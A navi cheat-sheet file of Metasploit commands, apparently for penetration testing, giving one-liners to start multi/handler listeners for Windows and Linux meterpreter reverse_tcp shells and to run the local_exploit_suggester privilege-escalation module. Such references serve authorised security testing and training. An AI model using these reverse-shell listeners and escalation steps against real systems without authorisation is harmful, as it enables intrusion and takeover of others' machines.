% sealldev, windows, msfconsole, metasploit
; From https://github.com/sealldeveloper/navi-cheats/

# [INSIDE METASPLOIT] List required options
options

# [INSIDE METASPLOIT] Set value for a variables
set <var>

# [INSIDE METASPLOIT] Set a global value for all instances of that variables
setg <var>

# [INSIDE METASPLOIT] Search everything
search <search>

# Setup Windows meterpreter shell listener
msfconsole -x "use exploit/multi/handler;set LHOST <listener-ip>;set LPORT <listener-port>;set payload windows/meterpreter/reverse_tcp;run"

% sealldev, linux, msfconsole, metasploit
# Setup Linux [x64] meterpreter shell listener
msfconsole -x "use exploit/multi/handler;set LHOST <listener-ip>;set LPORT <listener-port>;set payload linux/x64/meterpreter/reverse_tcp;run"

# Setup Linux [x86] meterpreter shell listener
msfconsole -x "use exploit/multi/handler;set LHOST <listener-ip>;set LPORT <listener-port>;set payload linux/x86/meterpreter/reverse_tcp;run"

% sealldev, linux, windows, msfconsole, metasploit, privesc
# [INSIDE METASPLOIT] Meterpreter Shell - LPE for Windows and Linux
run post/multi/recon/local_exploit_suggester